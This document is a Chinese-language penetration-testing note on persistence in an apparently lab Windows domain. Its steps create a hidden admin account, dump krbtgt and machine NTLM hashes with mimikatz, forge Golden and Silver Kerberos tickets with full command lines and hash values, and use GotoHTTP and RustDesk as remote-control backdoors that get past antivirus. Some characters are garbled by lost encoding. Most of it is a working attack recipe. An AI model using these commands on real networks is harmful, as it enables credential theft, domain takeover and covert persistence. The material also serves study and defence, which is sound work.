0x01權(quán)限維持-隱藏用戶

CreateHiddenAccount工具

CreateHiddenAccount -u test -p P@sswrd

用戶管理能查看到，命令查看看不到，單機(jī)版無(wú)法刪除(不在任何組)，域環(huán)境(在administrator組中)可以刪除

0x02權(quán)限維持-黃金白銀票據(jù)

??票據(jù)?成攻擊，是?成有效的TGT Kerberos票據(jù)，并且不受TGT?命周期的影響（TGT默認(rèn)10?時(shí)，最多續(xù)訂7天），這?可以為任意?戶?成??票據(jù)，然后為域管理員?成TGT，這樣普通?戶就可以變成域管理員。
白銀票據(jù)（SILVER TICKET）是利用域的服務(wù)賬戶進(jìn)行偽造的ST，在Kerberos認(rèn)證的第三步，Client帶著ST和Authenticator3向Server上的某個(gè)服務(wù)進(jìn)行請(qǐng)求，Server接收到Client的請(qǐng)求之后，通過(guò)自己的Master Key 解密ST，從而獲得 Session Key。所以只需要知道Server用戶的Hash就可以偽造出一個(gè)ST，且不會(huì)經(jīng)過(guò)KDC，但是偽造的門(mén)票只對(duì)部分服務(wù)起作用（不需要交互KDC，需要知道Server的NTLM Hash）。

一、黃金票據(jù)
利用條件：
1.已經(jīng)拿下域管理員，獲取到krbtgt hash
2.利用krbtgt的hash制作黃金票據(jù)工具，進(jìn)行攻擊
利用：
1.獲取域的sid值，最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

2.域的KRBTGT賬戶NTLM-HASH：b097d7ed97495408e1537f706c357fc5

mimikatz privilege::debug
mimikatz lsadump::lsa /patch

3.偽造用戶名：dbadmin（任意用戶名）
生成票據(jù)：
mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g

導(dǎo)入內(nèi)存

mimikatz kerberos::ptt g

訪問(wèn)測(cè)試：

dir \\owa2010cn-god\c$

黃金票據(jù)總結(jié)：
該攻擊?式其實(shí)是?種后?的形式，屬于第?次進(jìn)?攻擊的?法。
第?次拿到域管權(quán)限之后，需要將krbtgt NTLM hash進(jìn)?保存，當(dāng)?shù)?次再來(lái)進(jìn)?域滲透攻擊時(shí)，我們就可使?krbtgt的NTLM hash制作??票據(jù)，從?再次獲得域管權(quán)限。

二、白銀票據(jù)
1.已經(jīng)拿下域管理員，獲取到DC hash
2.利用DC的hash制作白銀票據(jù)工具，進(jìn)行攻擊
利用：
1.獲取域的sid值，最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

2.域DC賬戶NTLM-HASH bfe8cf6709038dd075d4cb5553b56412

mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords

3.偽造用戶名：dbbadmin（任意用戶名）
導(dǎo)入票據(jù)：（CIFS文件共享服務(wù)）
domain：域名
sid：域環(huán)境下的SID，除去最后-的部分剩下的內(nèi)容
target：要訪問(wèn)的服務(wù)器，寫(xiě)FQDN
rc4：寫(xiě)的是目標(biāo)主機(jī)的NTLM（主機(jī)名$對(duì)應(yīng)NTLM）
service：要訪問(wèn)的資源類型
user：偽造的用戶
cifs：共享文件

mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god /service:cifs /rc4:bfe8cf6709038dd075d4cb5553b56412 /ptt

失敗了

白銀票據(jù)總結(jié)
1.偽造的ST，只能訪問(wèn)指定的服務(wù)，如CIFS；
2.不與KDC交互，直接訪問(wèn)Server；
3.ST由服務(wù)賬號(hào) NTLM Hash 加密。

#權(quán)限維持-遠(yuǎn)控軟件-GotoHTTP&RustDesk
一、GotoHTTP
利用場(chǎng)景：有網(wǎng)絡(luò)下，需要繞過(guò)殺毒等網(wǎng)絡(luò)防護(hù)
B2C模式，無(wú)需安裝控制端軟件，有瀏覽器就可以遠(yuǎn)控。
流量走h(yuǎn)ttps協(xié)議，只要目標(biāo)放行443端口出口就可以實(shí)現(xiàn)內(nèi)網(wǎng)穿透。
二、 RustDesk
利用場(chǎng)景：無(wú)需網(wǎng)絡(luò)，需要繞過(guò)殺毒等網(wǎng)絡(luò)防護(hù)
1、有網(wǎng)連接：
C:\Users\用戶名\AppData\Roaming\RustDesk\config
其中ID和密碼在RustDesk.toml文件里。

連接：

2、無(wú)網(wǎng)內(nèi)網(wǎng)連接：IP直連
注意權(quán)限問(wèn)題，最好以管理員打開(kāi)，這樣才能創(chuàng)建監(jiān)聽(tīng)端口，或使用已開(kāi)啟監(jiān)聽(tīng)的端口
RustDesk2.toml

direct-server = 'Y'
direct-access-port = '8443'